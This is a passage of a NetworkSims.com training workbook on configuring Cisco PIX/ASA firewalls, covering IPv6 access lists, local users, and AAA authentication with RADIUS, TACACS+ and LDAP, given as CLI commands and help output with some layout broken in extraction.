interface
Use interface address as source address
object-group
Network object-group for source address
(config)# ipv6 access-list testing deny ip 3EFE:3031:3::/48
(config)# ipv6 access-list testing deny ip 3EFE:3031:3::/48 ?
Hostname or A.B.C.D Destination IP address
X:X:X:X::X/<0-128>
Destination IPv6 address/prefix
any
Abbreviation for destination prefix ::/0
host
Use this keyword to configure destination host
interface
Use interface address as destination address
object-group
Network object-group for destination address
(config)# ipv6 access-list testing permit ip any any
(config)# int e0
(config-if)# exit
(config)# access-group testing interface inside
(config)# access-group testing interface outside

NetworkSims.com
681
Outline
This challenge involves taking a PIX test on IPv6. The main facts are:
An IPv6 address has 128 bits.

The Interface ID is based on 64 bits from the MAC address (which has 48 bits).
The format is in two digit hexademical seperated by colons.
A double colon represent a run of zeros.

Title: Defining users and passwords
Outline
The PIX/ASA has a local database for users which defines user details for:
CLI access login. This involves the user authentication for login to the device.
Privilege mode authentication. This defines the privileged level for the access. With a
Cisco device the highest privileged level is 15.
Command authentication. This defines the commands that can be executed for given
levels of user authentication.
Network access authentication.
VPN authentication/authorization.
The local user database is also useful as a fallback system, when the back-end user
authentication system, such as for a RADIUS user authentication system fails, the local
database should still work.
Objectives

Define username and password. The user name can be between 4 and 64 characters,
while the password by be between 3 and 16 characters.
Define username attributes. This supports the username mode (config-username),
and includes user specific information, such as for VPN settings.
Define a privileged level. By default the privilege level is 2. The lowest is 0, and the
highest is 16.
NetworkSims.com
682
Commands
> enable
# config t
amsterdam (config-if)# nameif newyork
amsterdam (config)# username bert password test privilege 15
amsterdam (config)# username anne password test
amsterdam (config)# username anne attrib
amsterdam (config-username)# service-type nas-prompt
Example
> enable
# config t
amsterdam (config-if)# nameif newyork
amsterdam (config)# username ?
WORD < 65 char Enter the name of the user. A minimum of 4 characters is
required. A maximum of 64 characters is allowed.
amsterdam (config)# username anne ?
attributes Enter the attributes sub-command mode for the specified user
nopassword Indicates that this user has no password
password
amsterdam (config)# username anne password ?
WORD Enter the password for this user
amsterdam (config)# username anne password test
amsterdam (config)# username bert password test ?
encrypted
Indicates the <password> entered is encrypted
mschap
The password will be converted to unicode and hashed using MD4.
User entries must be created this way if they are to be
authenticated using MSCHAPv1 or MSCHAPv2
NetworkSims.com
683
nt-encrypted
privilege
<cr>
Indicates the <password> entered has been converted to unicode

and hashed using MD4, and can be used for MS-CHAP.
Enter the privilege level for this user
amsterdam (config)# username bert password privilege ?

<0-15> The privilege level for this user
amsterdam (config)# username bert password test privilege 15
amsterdam (config)# username anne attrib
amsterdam (config-username)# ?
username configuration commands:
exit
Exit from username attribute configuration mode
group-lock
Enter name of an existing tunnel-group that the user
is required to connect with
help
Help for username configuration commands
no
password-storage
Enable/disable storage of the login password on the
client system
service-type
Define service-type
vpn-access-hours
Enter name of a configured time-range policy
vpn-filter
Enter name of user specific ACL
vpn-framed-ip-address
Enter the IP address and the net mask to be assigned
to the client
vpn-group-policy
Enter name of a group-policy to inherit attributes
from
vpn-idle-timeout
Enter idle timeout period in minutes, enter none to
disable
vpn-session-timeout
Enter maximum user connection time in minutes, enter
none for unlimited time
vpn-simultaneous-logins Enter maximum number of simultaneous logins allowed
vpn-tunnel-protocol
Enter permitted tunneling protocols
webvpn
Configure user policy for WebVPN
amsterdam (config-username)# service-type ?
username mode commands/options:
admin
User is allowed access to the configuration prompt.
nas-prompt
User is allowed access to the exec prompt.
remote-access User is allowed network access.
amsterdam (config-username)# service-type nas-prompt

Title: Defining local authentication
Outline
The PIX/ASA has a local database for users, and can use AAA for local authentication. This
is enabled with the following for checking users against the local database for serial (console
connection), telnet (Telnet connection), ssh (SSH connection) and http (Web connection)
login:
NetworkSims.com
684
(config)#
(config)#
(config)#
(config)#
aaa
aaa
aaa
aaa
authentication
authentication
authentication
authentication
serial console MYLOCAL

telnet console MYLOCAL
ssh console MYLOCAL
http console MYLOCAL
The console keyword is important as it defines that management sessions are authenticated,
whereas local defines that the local database is used.
Also users can be authenticated for the enable mode with:
(config)# aaa authentication enable console MYLOCAL
Where level 15 is the level required for the enable password command. Also the aaa-server
command can be used to intercept any outgoing AAA requests to the local database:
(config)# aaa-server MYLOCAL protocol local
Objectives

Define username and password. The user name can be between 4 and 64 characters,
while the password by be between 3 and 16 characters.
Define authorization for Console, SSH, Telnet and HTTP login (aaa authentication
http console MYLOCAL).
Define local authentication (aaa-server MYLOCAL protocol local).
Commands
> enable
# config t
(config)# int e0
(config-if)# nameif california
(config-if)# exit
(config)# int e1
(config-if)# nameif texas
(config-if)# exit
(config)# int e2
(config-if)# exit
(config)# username bert password test privilege 15
(config)# aaa authentication serial console MYLOCAL
(config)# aaa authentication telnet console MYLOCAL
(config)# aaa authentication ssh console MYLOCAL
(config)# aaa authentication http console MYLOCAL
NetworkSims.com
685
Example
> enable
# config t
(config)# int e0
(config-if)# nameif california
(config-if)# exit
(config)# int e1
(config-if)# nameif texas
(config-if)# exit
(config)# int e2
(config-if)# exit
(config)# username bert password test privilege 15
pixfirewall(config)# aaa-s ?
pixfirewall(config)# aaa-s MYLOCAL ?
(
deadtime
host
server
is deactivated
protocol
(config)# aaa-server MYLOCAL protocol ?
http-form Protocol HTTP form-based
kerberos
Protocol Kerberos
ldap
Protocol LDAP
local
Protocol Local
nt
Protocol NT
radius
Protocol RADIUS
sdi
Protocol SDI
tacacs+
Protocol TACACS+
(config)# aaa ?
accounting
Configure user accounting parameters
authentication Configure user authentication parameters
authorization
Configure user authorization parameters
local
AAA Local method options
mac-exempt
Configure MAC Exempt parameters
proxy-limit
Configure number of concurrent proxy connections allowed per
user
NetworkSims.com
686

enable
Enable
exclude
Exclude the service, local and foreign network which
http
HTTP
include
Include the service, local and foreign network which
match
Specify this keyword to configure an ACL to match
secure-http-client Specify this keyword to ensure HTTP client authentication
is secured (over SSL)
serial
Serial
ssh
SSH
telnet
Telnet
(config)# aaa auth serial ?
console Specify this keyword to identify a server group for administrative
authentication
(config)# aaa auth serial console ?
LOCAL Predefined server tag for AAA protocol 'local'
WORD
Name of RADIUS or TACACS+ aaa-server group for administrative
Authentication
(config)#
(config)#
(config)#
(config)#
(config)#
aaa
aaa
aaa
aaa
aaa
authentication
authentication
authentication
authentication
authentication
serial console MYLOCAL

telnet console MYLOCAL
ssh console MYLOCAL
http console MYLOCAL
enable console MYLOCAL

Title: RADIUS Authentication
Outline
The ASA/PIX device supports a wide range of AAA backbones, including RADIUS (Remote
Authentication Dial In User Service), Tacacs+, NT, LDAP, SDI and Kerberos. RADIUS is a
useful system for authentication, as it is well supported in many systems, and is common in
wireless systems. Microsoft RADIUS servers default to 1812 (accounting) and 1813
(authentication), but Cisco and Juniper RADIUS servers use default ports of 1645 (for
accounting) and 1646 (for authentication). RADIUS uses UDP over IP, and combines
authentication and authorization.
For the configuration, a group AAA server is defined initally:
(config)# aaa-server TEST protocol radius
(config-aaa-server-group)# max-failed-attempts 5
NetworkSims.com
687
(config-aaa-server-group)# reactivation-mode depletion deadtime 10

This defines a group name of TEST. Next the details of each of the servers in the group are
defined, such as for a single server host of:
(config)# aaa-server test
(newyork) host 1.2.3.4

key testkey
authentication-port 1645
accounting-port 1646
retry-interval 10
exit
Which defines that the server is on the (newyork) interface, and has an address of 1.2.3.4.
With RADIUS a shared key is used, which is defined by the key command. This must be the
same as the key defined on the server. In this case the authenticdation and accounting ports
are defined as 1645 and 1646, respectively.
The main settings for RADIUS are:
Accounting-port. This is the port which the RADIUS server listens to account
communications on. Default = 1646.
Authorization-port. This is the port which the RADIUS server listens to
authorization communications on. Default = 1645.
Retry-interval. This is the time that the device will wait for the RADIUS server to
communicate before it tries again. Default = 10 seconds.
Timeout. This is the timeout that the device will wait before it times-out the
communications. Default = 10 seconds.
Key. This is the key that the device and the server will use.
Objectives

Define an AAA host.
Commands
(config)# int e0
(config-if)# exit
NetworkSims.com
688

(config-aaa-server-host)# exit
Example
(config)# int e0
(config-if)# exit
pixfirewall(config)# aaa-server ?
pixfirewall(config)# aaa-server test ?
(
deadtime
host
server
is deactivated
protocol
pixfirewall(config)# aaa-server test protocol ?
kerberos Protocol Kerberos
ldap
Protocol LDAP
nt
Protocol NT
radius
Protocol RADIUS
sdi
Protocol SDI
tacacs+
Protocol TACACS+
(config-aaa-server-group)# ?
accounting-mode
Enter this keyword to specify accounting mode
exit
Exit from aaa-server group configuration mode
help
is deactivated
no
Remove an item from aaa-server group configuration
reactivation-mode
reactivated
(config-aaa-server-group)# max-failed-attempts ?
NetworkSims.com
689

<1-5> Maximum number of failures (1-5)
(config-aaa-server-group)# reactivation-mode ?
depletion Failed servers will remain inactive until all other servers in
this group are inactive
timed
Failed servers will be reactivated after 30 seconds of down time
(config)# aaa-server test ?
(
deadtime
host
server
is deactivated
protocol
(config)# aaa-server test (newyork) ?
host Enter this keyword to specify the IP address for the server
(config)# aaa-server test (newyork) host ?
Hostname or A.B.C.D Enter an IP address or a name
WORD < 129 char
Enter a DNS name
(config)# aaa-server test (newyork) host 1.2.3.4 ?
WORD
Alphanumeric keyword up to 128 characters used as the encryption key
for communicating with the AAA server.
timeout Specify the maximum time to wait for response from configured server
<cr>
(config)# aaa-server test (inside) host 1.2.3.4
accounting-port
Specify the port number to be used for accounting
acl-netmask-convert Specify the ACL Downloadable Netmask Operation
authentication-port Specify the port number to be used for authentication
exit
help
key
Specify the secret used to authenticate the NAS to the
AAA server
no
radius-common-pw
Specify a common password for all RADIUS authorization
NetworkSims.com
690
retry-interval
timeout
transactions
Specify the amount of time between retry attempts
configured server
(config-aaa-server-host)# key ?
(config-aaa-server-host)# accounting-port ?
<0-65535> Enter port number (0 - 65535)
(config-aaa-server-host)# retry-interval ?

Title: Tacacs+ Authentication
Outline
The ASA/PIX device supports a wide range of AAA backbones, including RADIUS (Remote
Authentication Dial In User Service), Tacacs+, NT, LDAP, SDI and Kerberos. Tacacs+ uses
TCP over IP, and has seperate elements for Authentication, Authorization and Accounting.
(config)# aaa-server TEST protocol tacacs+
NetworkSims.com
691
With RADIUS a shared key is used, which is defined by the key command. This must be the
same as the key defined on the server.
Objectives

Define an AAA host.
Commands
(config)# int e0
(config-if)# exit

Title: LDAP Authentication
Outline
The ASA/PIX device supports a wide range of AAA backbones, including Tacacs+, NT,
LDAP (Lightweight Directory Access Protocol), SDI and Kerberos. LDAP is a useful method
in authentication. LDAP is an application protocol that builds on TCP and IP and is used to
query and modify directory services. It can also be used for authentication.
(config)# aaa-server TEST protocol ldap
NetworkSims.com
692
(config)# aaa-server TEST

(newyork) host 1.2.3.4

timeout 10
ldap-over-ssl enable
server-type Microsoft
sasl-mechanism digest-md5
exit
With LDAP the main parameters which can be set are:
ldap-base-dn
ldap-defaults
ldap-dn
ldap-login-dn
ldap-login-password
ldap-naming-attribute
ldap-scope
timeout
server-port
For LDAP the PIX/ASA passes the user details to the LDAP server, by default, in a plaintext
format for the username and password. If this is seen as a security problem, the username
and password can be sent over an SSL connection using the ldap-over-ssl command. Also
the LDAP server type can be Sun, Microsoft or Auto-detect. This is defined with the servertype command.
Objectives
Define an AAA group tag for LDAP.

Define an AAA host.
Define LDAP over SSL for secure username and password transmission.
Commands
(config)# int e0
(config-if)# exit
(config-aaa-server-host)# timeout 10
(config-aaa-server-host)# ldap-over-ssl enable
NetworkSims.com
693
(config-aaa-server-host)# server-type Microsoft

(config-aaa-server-host)# sasl-mechanism digest-md5
Example
(config)# int e0
(config-if)# exit
AAA server configuration
exit
help
ldap-attribute-map
ldap-base-dn
commands:
Specify the name of the LDAP attribute mapping table
Specify the location to begin searching in the LDAP
hierarchy
ldap-login-dn
Specify the DN to be used to bind to the LDAP server
ldap-login-password
Specify password to be used to bind to the LDAP server
ldap-naming-attribute Specify the Relative Distinguished Name attribute that
uniquely identifies an entry on the LDAP server
ldap-over-ssl
Specify if an SSL connection is needed to the LDAP
server
ldap-scope
Specify the extent of the search in the LDAP hierarchy
no
sasl-mechanism
Specify which authentication mechanism(s) to use with
the LDAP server
server-port
Specify the port number to be used for AAA operations
server-type
Specify the vendor of the LDAP server
timeout
configured server
(config-aaa-server-host)# ldap-over-ssl ?
enable Require an SSL connection to the LDAP server
(config-aaa-server-host)# server-type ?
auto-detect Specify the vendor of the LDAP server is auto-detected
microsoft
Specify the vendor of the LDAP server is Microsoft
sun
Specify the vendor of the LDAP server is Sun
(config-aaa-server-host)# sasl-mechanism ?
digest-md5 select Digest-MD5
kerberos
select Kerberos
permit Keyword for enabling this functionality
NetworkSims.com
694

Title: VPN Access with LDAP Authentication
Outline
LDAP can be used to authenticate users for VPN access. When this happens the PIX/ASA
then queries the LDAP server for its attributes. To setup LDAP authorization, a tunnel
group is setup, along with an AAA server group. For the tunnel group:
(config)# tunnel-group TEST type ipsec-ra
(config)# tunnel-group TEST general-attributes
(config-general)# authorization-server-group LDAP1
(config-general)# exit
Where:
tunnel-group TEST type ipsec-ra defines an IPSec tunnel named TEST.

authorization-server-group LDAP1 which defines that LDAP1 is the authorization
server group name.
Next the server group is defined:

(config)# aaa-server LDAP1 protocol ldap
(config-aaa-server-host)# ldap-login-dn testing123
(config-aaa-server-host)# ldap-base-dn location123
(config-aaa-server-host)# ldap-scope subtree
Where:
ldap-scope subtree searches all the levels beneath the base DN (Distinguished
Name).
ldap-base-dn location123 defines that location123 is the location to begin searching
in the LDAP hierarchy
ldap-login-dn testing123 defines that testing123 is the DN used to bind to the
LDAP server.
Objectives
NetworkSims.com
695
Define a tunnel group with attributes.

Define LDAP details for VPN access.
Commands
(config)# int e0
(config-if)# exit
Example
(config)# int e0
(config-if)# exit
(config)# tunnel-group ?
WORD < 65 char Enter the name of the tunnel group
(config)# tunnel-group TEST ?
ipsec-attributes
type
(config)# tunnel-group TEST type ?
ipsec-l2l IPSec Site to Site group
ipsec-ra
IPSec Remote Access group
(config-general)# ?
accounting-server-group
Enter name of the accounting server group
address-pool
Enter a list of address pools to assign
addresses from
authentication-server-group Enter name of the authentication server group
authorization-server-group
Enter name of the authorization server group
default-group-policy
Enter name of the default group policy
dhcp-server
Enter IP address or name of the DHCP server
exit
Exit from tunnel-group general attribute
NetworkSims.com
696
help
no
strip-group
strip-realm
configuration mode
Enable strip-group processing
Enable strip-realm processing
(config-general)# authorization-server-group ?
tunnel-group-general mode commands/options:
WORD < 17 char Name of authorization server group
(config-aaa-server-host)# ldap-login-dn ?
LINE < 129 char The DN used to bind to the LDAP server
(config-aaa-server-host)# ldap-base-dn ?
LINE < 129 char The location to begin searching in the LDAP hierarchy
(config-aaa-server-host)# ldap-scope ?
onelevel Search only one level beneath the Base DN
subtree
Search all levels beneath the Base DN

Title: LDAP Attribute Mapping
Outline
Typically the LDAP attribute names and values are different between the PIX/ASA and the
LDAP server. This challenge involves remapping these. The commands used are:
(config)# ldap attribute-map testing
(config-ldap-attribute-map)# map-name testing CiscoAttr1
(config-ldap-attribute-map)# map-value testing CiscoAttr2
Objectives
NetworkSims.com
697

Define LDAP attributes
Commands
(config)# int e0
(config-if)# exit
(config-ldap-attribute-map)# map-name testing Cisco1
(config-ldap-attribute-map)# map-value testing Cisco2
Example
(config)# int e0
(config-if)# exit
(config)# ldap ?
attribute-map keyword
(config)# ldap attribute-map ?
LINE < 64 char Enter LDAP Mapping Name
(config-ldap-attribute-map)# ?
LDAP commands:
exit
Exit from LDAP Attribute configuration mode
map-name
map-name configuration
map-value map-value configuration
no
Remove a LDAP configuration
(config-ldap-attribute-map)# map-name ?
ldap mode commands/options:
WORD Enter Customer Atribute Name.
NetworkSims.com
698
(config-ldap-attribute-map)# map-name testing ?

cisco-attribute-names:
cVPN3000-Access-Hours
cVPN3000-Allow-Network-Extension-Mode
cVPN3000-Auth-Service-Type
cVPN3000-Authenticated-User-Idle-Timeout
cVPN3000-Authorization-Required
cVPN3000-Authorization-Type
cVPN3000-Cisco-AV-Pair
cVPN3000-Cisco-IP-Phone-Bypass
cVPN3000-Cisco-LEAP-Bypass
cVPN3000-Client-Intercept-DHCP-Configure-Msg
cVPN3000-Client-Type-Version-Limiting
cVPN3000-Confidence-Interval
cVPN3000-DHCP-Network-Scope
cVPN3000-DN-Field
cVPN3000-Firewall-ACL-In
cVPN3000-Firewall-ACL-Out
cVPN3000-IE-Proxy-Bypass-Local
cVPN3000-IE-Proxy-Exception-List
cVPN3000-IE-Proxy-Method
cVPN3000-IE-Proxy-Server
cVPN3000-IETF-Radius-Class
cVPN3000-IETF-Radius-Filter-Id
cVPN3000-IETF-Radius-Framed-IP-Address
cVPN3000-IETF-Radius-Framed-IP-Netmask
cVPN3000-IETF-Radius-Idle-Timeout
cVPN3000-IETF-Radius-Session-Timeout
cVPN3000-IKE-DPD-Retry-Interval
cVPN3000-IKE-Keep-Alives
cVPN3000-IPSec-Allow-Passwd-Store
cVPN3000-IPSec-Auth-On-Rekey
cVPN3000-IPSec-Authentication
cVPN3000-IPSec-Backup-Server-List
cVPN3000-IPSec-Backup-Servers
cVPN3000-IPSec-Banner1
cVPN3000-IPSec-Banner2
cVPN3000-IPSec-Client-Firewall-Filter-Name
cVPN3000-IPSec-Client-Firewall-Filter-Optional
cVPN3000-IPSec-Default-Domain
cVPN3000-IPSec-IKE-Peer-ID-Check
cVPN3000-IPSec-IP-Compression
cVPN3000-IPSec-Mode-Config
cVPN3000-IPSec-Over-UDP
cVPN3000-IPSec-Over-UDP-Port
cVPN3000-IPSec-Required-Client-Firewall-Capability
cVPN3000-IPSec-Sec-Association
cVPN3000-IPSec-Split-DNS-Names
cVPN3000-IPSec-Split-Tunnel-List
cVPN3000-IPSec-Split-Tunneling-Policy
cVPN3000-IPSec-Tunnel-Type
cVPN3000-IPSec-User-Group-Lock
cVPN3000-L2TP-Encryption
cVPN3000-L2TP-MPPC-Compression
cVPN3000-LDAP-Base-DN
cVPN3000-LDAP-CRL-Data
cVPN3000-LDAP-Filter
cVPN3000-LDAP-Host-Name
cVPN3000-LDAP-Host-Port
cVPN3000-LDAP-Login
NetworkSims.com
699
cVPN3000-LDAP-Password
cVPN3000-LDAP-Request-Type
cVPN3000-LDAP-Scope
cVPN3000-LDAP-Version
cVPN3000-MS-Client-Subnet-Mask
cVPN3000-PFS-Required
cVPN3000-PPTP-Encryption
cVPN3000-PPTP-MPPC-Compression
cVPN3000-Primary-DNS
cVPN3000-Primary-WINS
cVPN3000-Require-HW-Client-Auth
cVPN3000-Require-Individual-User-Auth
cVPN3000-Required-Client-Firewall-Description
cVPN3000-Required-Client-Firewall-Product-Code
cVPN3000-Required-Client-Firewall-Vendor-Code
cVPN3000-SEP-Card-Assignment
cVPN3000-Secondary-DNS
cVPN3000-Secondary-WINS
cVPN3000-Simultaneous-Logins
cVPN3000-Strip-Realm
cVPN3000-TACACS-Authtype
cVPN3000-TACACS-Privilege-Level
cVPN3000-Tunnel-Group-Lock
cVPN3000-Tunneling-Protocols
cVPN3000-Use-Client-Address
cVPN3000-User-Auth-Server-Name
cVPN3000-User-Auth-Server-Port
cVPN3000-User-Auth-Server-Secret
cVPN3000-WebVPN-ACL-Filters
cVPN3000-WebVPN-Apply-ACL-Enable
cVPN3000-WebVPN-Citrix-Support-Enable
cVPN3000-WebVPN-Content-Filter-Parameters
cVPN3000-WebVPN-Enable-Functions
cVPN3000-WebVPN-Exchange-NETBIOS-Name
cVPN3000-WebVPN-Exchange-Server-Address
cVPN3000-WebVPN-File-Access-Enable
cVPN3000-WebVPN-File-Server-Browsing-Enable
cVPN3000-WebVPN-File-Server-Entry-Enable
cVPN3000-WebVPN-Forwarded-Ports
cVPN3000-WebVPN-Homepage
cVPN3000-WebVPN-Port-Forwarding-Auto-Download-Enable
cVPN3000-WebVPN-Port-Forwarding-Enable
cVPN3000-WebVPN-Port-Forwarding-Exchange-Proxy-Enable
cVPN3000-WebVPN-Port-Forwarding-HTTP-Proxy-Enable
cVPN3000-WebVPN-Port-Forwarding-Name
cVPN3000-WebVPN-SVC-Client-DPD
cVPN3000-WebVPN-SVC-Compression
cVPN3000-WebVPN-SVC-Enable
cVPN3000-WebVPN-SVC-Gateway-DPD
cVPN3000-WebVPN-SVC-Keep-Enable
cVPN3000-WebVPN-SVC-Keepalive
cVPN3000-WebVPN-SVC-Rekey-Method
cVPN3000-WebVPN-SVC-Rekey-Period
cVPN3000-WebVPN-SVC-Required-Enable
cVPN3000-WebVPN-Single-Sign-On-Server-Name
cVPN3000-WebVPN-URL-Entry-Enable
cVPN3000-WebVPN-URL-List
cVPN3000-X509-Cert-Data
(config-ldap-attribute-map)# map-name testing cVPN3000-WebVPN-URL-List
(config-ldap-attribute-map)# map-value ?
NetworkSims.com
700
customer-attribute-names:
(config-ldap-attribute-map)# map-value testing cVPN3000-WebVPN-URL-List

Title: Using AAA for End-user Cut-through Proxy Applications
Outline
The PIX/ASA can authenticate users before they make connections. Once authenticated it is
then possible to cache the authentication for the user, so that there does not need to be a reauthentication with the authentication server. The PIX/ASA thus acts as an authentication
proxy, and the command which triggers the authentication is in the form of:
(config)#
(config)#
(config)#
(config)#
(config)#
aaa
aaa
aaa
aaa
aaa
authentication
authentication
authentication
authentication
authentication
include
include
include
include
include
telnet outside 0 0 0 0 SERVERTAG

ssh outside 0 0 0 0 SERVERTAG
ftp outside 0 0 0 0 SERVERTAG
http outside 0 0 0 0 SERVERTAG
https outside 0 0 0 0 SERVERTAG
which will authenticates all Telnet, SSH, Ftp, Http and Https accesses on the inside
interface, for all source and destination addresses (where 0 is the same as 0.0.0.0). In this
case SERVERTAG is the tag that defines the authentication, such as:
(config)# aaa-server SERVERTAG (inside) host 1.2.3.4
Objectives
Define an end-user cut-through proxy for various protocols..

Commands
(config)# int e0
(config-if)# exit
(config)# aaa-server SERVERTAG protocol radius
(config)# aaa authentication include telnet outside 0 0 0 0 SERVERTAG
(config)# aaa authentication include ssh outside 0 0 0 0 SERVERTAG
(config)# aaa authentication include ftp outside 0 0 0 0 SERVERTAG
(config)# aaa authentication include http outside 0 0 0 0 SERVERTAG
(config)# aaa authentication include https outside 0 0 0 0 SERVERTAG
NetworkSims.com
701
Example
(config)# int e0
(config-if)# exit
command Specify this keyword to allow command authorization to be configured
for all administrators on all consoles
exclude Exclude the service, local and foreign network which needs to be
authenticated, authorized, and accounted
include Include the service, local and foreign network which needs to be
match
(config)# aaa authentication include ?
WORD
Specify <protocol[/<port>] as the service to be authorized or
accounted
any
Specify all TCP as the service to be authenticated, authorized or
accounted
ftp
Specify FTP as the service to be authenticated, authorized or
accounted
http
Specify HTTP as the service to be authenticated, authorized or
accounted
https
Specify HTTPS as the service to be authenticated, authorized or
accounted
icmp/
Specify icmp/<port> as the service to be authorized or accounted
ssh
Specify SSH as the service to be authenticated, authorized or
accounted
tcp/
Specify tcp/<port> as the service to be authenticated, authorized or
accounted
tcp/0
Specify all TCP as the service to be authenticated, authorized or
accounted
telnet Specify telnet as the service to be authenticated, authorized or
accounted
udp/
Specify udp/<port> as the service to be authorized or accounted
(config)# aaa authentication include telnet ?
newyork Name of interface Ethernet0
(config)# aaa authentication include te newyork ?
Hostname or A.B.C.D The address and mask of the local/internal host which is
source or destination for connections requiring
authentication
(config)# aaa authentication include telnet newyork 0 ?
A.B.C.D Network mask to apply to <local ip address>
NetworkSims.com
702
(config)# aaa authentication include te newyork 0 0 ?

Hostname or A.B.C.D The address and mask of the foreign host which is either
source or destination for connections requiring
authentication
WORD
Specify name of server group defined by the aaa-server
command.
(config)# aaa authentication include te newyork 0 0 0 ?
A.B.C.D Network mask to apply to <foreign ip address>
(config)# aaa authentication include te newyork 0 0 0 0 ?
WORD Specify name of server group defined by the aaa-server command.
(config)# aaa authentication include te newyork 0 0 0 0 ANY ?
<cr>
(config)#
(config)#
(config)#
(config)#
(config)#
aaa
aaa
aaa
aaa
aaa
authentication
authentication
authentication
authentication
authentication
include
include
include
include
include


Title: AAA for End-user Cut-through Proxy Applications using an ACL
Outline
The PIX/ASA can authenticate users before they make connections. In the previous
challenge the protocol match was defined, such as:
which defines that all Telnet accesses will be authenticated against user credendials. If a
more complex method of filtering is required, ACLs can be used to determine the traffic to
be authenticated. For example:
(config)#
(config)#
(config)#
(config)#
access-list TEST permit

aaa authenication match
192.168.0.0
tcp any any
tcp any any
TEST inside
255.255.255.0
eq ftp
eq http
SERVERTAG
which will authenticates all incoming traffic from 192.168.0.0/24, and also all FTP and HTTP
accesses on the inside interface. In this case SERVERTAG is the tag that defines the
authentication, such as:
NetworkSims.com
703
Objectives
Define an end-user cut-through proxy for various protocols.

Define ACLs for interesting traffic to be authenticated.
Commands
(config)# int e0
(config-if)# exit
(config)# access-list TEST permit 192.168.0.0 255.255.255.0
(config)# access-list TEST permit tcp any any eq ftp
(config)# access-list TEST permit tcp any any eq http
(config)# aaa authenication match TEST newyork SERVERTAG
Example
(config)# int e0
(config-if)# exit
(config)# aaa ?
accounting
Configure user accounting parameters
authentication Configure user authentication parameters
authorization
Configure user authorization parameters
local
AAA Local method options
mac-exempt
Configure MAC Exempt parameters
proxy-limit
Configure number of concurrent proxy connections allowed per
user
command Specify this keyword to allow command authorization to be configured
for all administrators on all consoles
exclude Exclude the service, local and foreign network which needs to be
include Include the service, local and foreign network which needs to be
match
NetworkSims.com
704
(config)# aaa authentication match ?

WORD Name of configured access-list to match
(config)# aaa authentication TEST ?
newyork Name of interface Ethernet0
(config)# aaa authentication TEST newyork ?
LOCAL Predefined server tag for AAA protocol 'local'
WORD
Specify name of server group defined by the aaa-server command.
(config)# aaa authentication match TEST newyork
SERVERTAG

Title: AAA for End-user Cut-through Proxy Applications using an ACL, with a MAC-list
for exemptions
Outline
In the previous challenge an ACL was used to define the traffic to be authenticated, such as:
(config)#
(config)#
(config)#
(config)#
access-list TEST permit 192.168.0.0 255.255.255.0

access-list TEST permit tcp any any eq ftp
access-list TEST permit tcp any any eq http
aaa authentication match TEST inside SERVERTAG
It is possible to use SSL for all web-related authentication with:

(config)# aaa authentication secure-http-client
Along with this devices can be exempted from authentication with a MAC-list, such as:
(config)# mac-list MACLIST permit 00c0.0000.0001 ffff.ffff.ffff
which will allow the devices with the MAC addresses of 00c0.0000.0001 and 000c.0000.0002
to pass through without authentication. This is then applied with:
(config)# aaa mac-exempt match MACLIST
Objectives
NetworkSims.com
705

Define ACLs for interesting traffic to be authenticated.
Define a MAC-list for exempted devices.
Applied the MAC-list.
Commands
(config)# int e0
(config-if)# exit
Example
(config)# int e0
(config-if)# exit
(config)# mac-list ?
WORD Mac list identifier
(config)# mac-list MACLIST ?
deny
permit Specify packets to forward
(config)# mac-list MACLIST permit ?
H.H.H Match based on source MAC address
(config)# mac-list MACLIST permit 00c0.0000.0001

H.H.H Mac mask
NetworkSims.com
706

(config)# aaa mac-list ?
match Specify this keyword to configure a mac-list to match
(config)# aaa mac-list mac match ?
WORD Name of configured mac-list to match
(config)# aaa mac-list mac match MACLIST ?
<cr>

Title: Using AAA for End-user Cut-through Proxy Applications with a limit on per-user
proxy connections, and a timeout for inactivity.
Outline
The maximum number of per-user proxy connections is defined with:
(config)# aaa proxy-limit 50
which defines a limit for 50 active connections for each user. The maximum number that can
be set is 128, and the default is 16. Also the timeout for inactivity after a successful
authentication is defined with:
(config)# timeout uauth 00:30:00 inactivity
which defines an inactivity time of 30 minutes.

Objectives

Define a limit on per-user proxy connections.
Define a timeout for inactivity.
Commands
NetworkSims.com
707
(config)# int e0
(config-if)# exit
(config)# exit
# show uauth
Example
(config)# int e0
(config-if)# exit
(config)# aaa proxy-limit ?
<1-128> Number of concurrent proxy connections allowed per user (1 - 128),
default is 16
disable Disable concurrent proxy connections
(config)# timeout ?
conn
Configure idle time after which a TCP connection state
h225
Configure idle time after which an H.225 signaling conn
h323
icmp
mgcp
Configure idle time after which an MGCP media connection
mgcp-pat
Configure the time after which an MGCP PAT Xlate
will be removed, default is 0:05:00
sip
Configure idle time after which a SIP control connection
sip_media
Configure idle time after which a SIP Media connection
sunrpc
Configure idle time after which a SUNRPC slot
NetworkSims.com
708
uauth
udp
xlate

Configure idle time after which an authentication will no
longer be cached and the user will need to re-authenticate on
their connection, default is 0:05:00. The default uauth timer
is absolute.
Configure idle time after which general UDP states
will be closed, default is 0:02:00, This timer does not
apply to DNS or SUNRPC
Configure idle time after which a dynamic address
will be returned to the free pool, default is 3:00:00
(config)# timeout uauth ?

<0:0:0> - <1193:0:0> Idle time after which an authentication will no longer
be cached and the user will need to re-authenticate on
their connection, default is 0:05:00. The default uauth
timer is absolute.
(config)# timeout uauth 00:30:00 ?
absolute
Run uauth timer continuously, the default uauth timer is
absolute
conn
Configure idle time after which a TCP connection state will
be closed, default is 1:00:00
h225
Configure idle time after which an H.225 signaling conn will
h323
half-closed
Configure idle time after which a TCP half-closed connection
icmp
inactivity
Start uauth timer after a connection becomes idle
mgcp
Configure idle time after which an MGCP media connection will
mgcp-pat
Configure the time after which an MGCP PAT Xlate will be
removed, default is 0:05:00
sip
Configure idle time after which a SIP control connection will
sip-disconnect Configure idle timeout after which SIP session is deleted if
200 OK is not received for a CANCEL or BYE message, default s
0:02:00
sip-invite
Configure idle time after which pinholes for PROVISIONAL
responsesand media xlates will be closed, default is 0:03:00
sip_media
Configure idle time after which a SIP Media connection will
sunrpc
Configure idle time after which a SUNRPC slot will be closed,
default is 0:10:00
udp
Configure idle time after which general UDP states will be
closed, default is 0:02:00, This timer does not apply to DNS
or SUNRPC
xlate
Configure idle time after which a dynamic address will be
returned to the free pool, default is 3:00:00
<cr>
(config)# exit
(config)# show uauth
Authenticated Users
Authen In Progress
NetworkSims.com
Current
1
0
Most Seen
1
1
709
user 'fred' at 192.168.0.1, authorized to:

port 192.168.0.1/telnet
absolute
timeout: 0:05:00
inactivity timeout: 0:30:00
# sh ua ?
WORD
|
<cr>
User name
Output modifiers
# sh uauth fred
Authenticated Users
Authen In Progress
Current
0
0
Most Seen
0
0

Title: Using AAA Accounting
Outline
